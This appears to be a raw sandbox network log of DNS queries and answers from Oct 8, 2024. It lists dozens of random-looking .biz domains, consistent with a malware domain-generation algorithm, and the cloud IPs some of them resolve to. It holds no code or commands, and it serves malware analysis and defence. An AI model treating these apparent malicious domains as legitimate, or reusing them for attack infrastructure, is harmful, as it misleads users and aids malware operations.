                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.766700029 CEST192.168.2.41.1.1.10x8cb2Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.470787048 CEST192.168.2.41.1.1.10x6e2fStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.982357025 CEST192.168.2.41.1.1.10xc663Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.830379009 CEST192.168.2.41.1.1.10x8b30Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.889893055 CEST192.168.2.41.1.1.10x6a64Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.233333111 CEST192.168.2.41.1.1.10xde3bStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.415793896 CEST192.168.2.41.1.1.10xbec3Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.714534044 CEST192.168.2.41.1.1.10x625aStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.240989923 CEST192.168.2.41.1.1.10xb359Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.518723011 CEST192.168.2.41.1.1.10x90efStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.742652893 CEST192.168.2.41.1.1.10xf1f0Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.695209980 CEST192.168.2.41.1.1.10x1ea1Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.430032015 CEST192.168.2.41.1.1.10x6ebcStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.457879066 CEST192.168.2.41.1.1.10x6ebcStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.950795889 CEST192.168.2.41.1.1.10x70abStandard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.178881884 CEST192.168.2.41.1.1.10xd355Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.702183962 CEST192.168.2.41.1.1.10x29bdStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.210357904 CEST192.168.2.41.1.1.10x5bf8Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.238995075 CEST192.168.2.41.1.1.10x5bf8Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.671211958 CEST192.168.2.41.1.1.10x8c21Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.415429115 CEST192.168.2.41.1.1.10xb75aStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.748653889 CEST192.168.2.41.1.1.10xe4e8Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.450957060 CEST192.168.2.41.1.1.10x68f8Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.356120110 CEST192.168.2.41.1.1.10x479bStandard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.373310089 CEST192.168.2.41.1.1.10x8459Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.836406946 CEST192.168.2.41.1.1.10xe6d0Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.014857054 CEST192.168.2.41.1.1.10xbe6aStandard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.316493988 CEST192.168.2.41.1.1.10x775dStandard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.157902956 CEST192.168.2.41.1.1.10x3213Standard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.189524889 CEST192.168.2.41.1.1.10x3213Standard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.747030973 CEST192.168.2.41.1.1.10xd597Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.773009062 CEST192.168.2.41.1.1.10xd597Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.201862097 CEST192.168.2.41.1.1.10x854fStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.324254036 CEST192.168.2.41.1.1.10x35aStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.348458052 CEST192.168.2.41.1.1.10x35aStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.911639929 CEST192.168.2.41.1.1.10xb5feStandard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.184242010 CEST192.168.2.41.1.1.10x2d22Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.790656090 CEST192.168.2.41.1.1.10xadeStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.818725109 CEST192.168.2.41.1.1.10xadeStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.071192026 CEST192.168.2.41.1.1.10x51d9Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.491797924 CEST192.168.2.41.1.1.10x6832Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.867744923 CEST192.168.2.41.1.1.10x435aStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.328155994 CEST192.168.2.41.1.1.10xfdbbStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.878613949 CEST192.168.2.41.1.1.10xa7ecStandard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.659229994 CEST192.168.2.41.1.1.10xb5b3Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.675129890 CEST192.168.2.41.1.1.10x2fabStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179923058 CEST192.168.2.41.1.1.10x379dStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.181010008 CEST192.168.2.41.1.1.10xed19Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.661375999 CEST192.168.2.41.1.1.10x33d6Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.692615986 CEST192.168.2.41.1.1.10x33d6Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.927440882 CEST192.168.2.41.1.1.10x7bf6Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.936163902 CEST192.168.2.41.1.1.10x1203Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.326968908 CEST192.168.2.41.1.1.10x1342Standard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.687215090 CEST192.168.2.41.1.1.10x4276Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.180896997 CEST192.168.2.41.1.1.10xe83fStandard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.712219000 CEST192.168.2.41.1.1.10x50a2Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.739110947 CEST192.168.2.41.1.1.10x50a2Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.935528040 CEST192.168.2.41.1.1.10x5927Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.957787037 CEST192.168.2.41.1.1.10x5927Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:20.973753929 CEST192.168.2.41.1.1.10x5927Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.080030918 CEST192.168.2.41.1.1.10xf373Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.989650965 CEST192.168.2.41.1.1.10x8c5cStandard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.682863951 CEST192.168.2.41.1.1.10xfda0Standard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.768739939 CEST192.168.2.41.1.1.10x62edStandard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.588457108 CEST192.168.2.41.1.1.10x8d58Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.802922964 CEST192.168.2.41.1.1.10x5d7fStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.145896912 CEST192.168.2.41.1.1.10xe42fStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.751966953 CEST192.168.2.41.1.1.10xac7fStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.333559036 CEST192.168.2.41.1.1.10x79daStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.695791960 CEST192.168.2.41.1.1.10x63c5Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.721791029 CEST192.168.2.41.1.1.10xac14Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.739372969 CEST192.168.2.41.1.1.10xac14Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.674520969 CEST192.168.2.41.1.1.10x1cedStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.188338041 CEST192.168.2.41.1.1.10x6d2bStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.830955982 CEST192.168.2.41.1.1.10xd64Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.186583042 CEST192.168.2.41.1.1.10x3a83Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.888664007 CEST192.168.2.41.1.1.10xdf0cStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.631711960 CEST192.168.2.41.1.1.10xafd6Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.389748096 CEST192.168.2.41.1.1.10xc8d6Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.411658049 CEST192.168.2.41.1.1.10xc8d6Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.979176044 CEST192.168.2.41.1.1.10xc76dStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.046585083 CEST192.168.2.41.1.1.10x91fcStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.148015022 CEST192.168.2.41.1.1.10xe9aStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.176611900 CEST192.168.2.41.1.1.10x74cdStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.258775949 CEST192.168.2.41.1.1.10x5f0Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:54.067528963 CEST192.168.2.41.1.1.10x8482Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.765467882 CEST192.168.2.41.1.1.10x93ecStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.300477028 CEST192.168.2.41.1.1.10xf9Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.818048000 CEST192.168.2.41.1.1.10xb603Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.897269964 CEST192.168.2.41.1.1.10xc08eStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.926830053 CEST192.168.2.41.1.1.10xc08eStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.774672031 CEST1.1.1.1192.168.2.40xd5e3No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.585037947 CEST1.1.1.1192.168.2.40x1e9fNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.651650906 CEST1.1.1.1192.168.2.40x42c2No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.422286987 CEST1.1.1.1192.168.2.40x1257No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.980623007 CEST1.1.1.1192.168.2.40x1d17No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.293546915 CEST1.1.1.1192.168.2.40x99aeNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.293546915 CEST1.1.1.1192.168.2.40x99aeNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.910003901 CEST1.1.1.1192.168.2.40xb223No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.229948044 CEST1.1.1.1192.168.2.40xa254No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.327291965 CEST1.1.1.1192.168.2.40x7e77No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.075503111 CEST1.1.1.1192.168.2.40xa1c0No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.200038910 CEST1.1.1.1192.168.2.40x61e3No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.925452948 CEST1.1.1.1192.168.2.40x78d3No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.133580923 CEST1.1.1.1192.168.2.40xc494No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.707488060 CEST1.1.1.1192.168.2.40xb6f0No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.168936014 CEST1.1.1.1192.168.2.40x6fe8No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.326406956 CEST1.1.1.1192.168.2.40x755bNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.326406956 CEST1.1.1.1192.168.2.40x755bNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.658698082 CEST1.1.1.1192.168.2.40xdc0fNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.990386009 CEST1.1.1.1192.168.2.40x4b3cNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.484894037 CEST1.1.1.1192.168.2.40x23c8No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.123692036 CEST1.1.1.1192.168.2.40x140No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.385152102 CEST1.1.1.1192.168.2.40x72a9No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.196222067 CEST1.1.1.1192.168.2.40xb467No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.225687027 CEST1.1.1.1192.168.2.40xaeebNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.048091888 CEST1.1.1.1192.168.2.40x54bfNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.181853056 CEST1.1.1.1192.168.2.40x323fNo error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.830239058 CEST1.1.1.1192.168.2.40x1ee7No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.830239058 CEST1.1.1.1192.168.2.40x1ee7No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.811986923 CEST1.1.1.1192.168.2.40x7bc3No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.151696920 CEST1.1.1.1192.168.2.40xb990No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.355309010 CEST1.1.1.1192.168.2.40x92f0No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.908399105 CEST1.1.1.1192.168.2.40x7154No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.010552883 CEST1.1.1.1192.168.2.40x179aNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.882520914 CEST1.1.1.1192.168.2.40x3464No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.371299982 CEST1.1.1.1192.168.2.40xce8No error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.856000900 CEST1.1.1.1192.168.2.40x7146No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.973038912 CEST1.1.1.1192.168.2.40x3951No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.808923006 CEST1.1.1.1192.168.2.40x4c3aNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.317178011 CEST1.1.1.1192.168.2.40xef01No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.661354065 CEST1.1.1.1192.168.2.40x8810No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.931345940 CEST1.1.1.1192.168.2.40x4126No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.908610106 CEST1.1.1.1192.168.2.40x5a11No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.253679991 CEST1.1.1.1192.168.2.40x24bcNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.827857971 CEST1.1.1.1192.168.2.40x2a38No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.153832912 CEST1.1.1.1192.168.2.40xd9dfNo error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.556078911 CEST1.1.1.1192.168.2.40xd718No error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.631300926 CEST1.1.1.1192.168.2.40x298No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.400057077 CEST1.1.1.1192.168.2.40x2fe4No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.159790039 CEST1.1.1.1192.168.2.40x4b25No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.270854950 CEST1.1.1.1192.168.2.40xb164No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.147747040 CEST1.1.1.1192.168.2.40xb88fNo error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.313606024 CEST1.1.1.1192.168.2.40xe89bNo error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.014929056 CEST1.1.1.1192.168.2.40xefffNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642077923 CEST1.1.1.1192.168.2.40xabadNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642086983 CEST1.1.1.1192.168.2.40x699cNo error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.477194071 CEST1.1.1.1192.168.2.40x51cNo error (0)cikivjto.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.685930967 CEST1.1.1.1192.168.2.40x3112No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
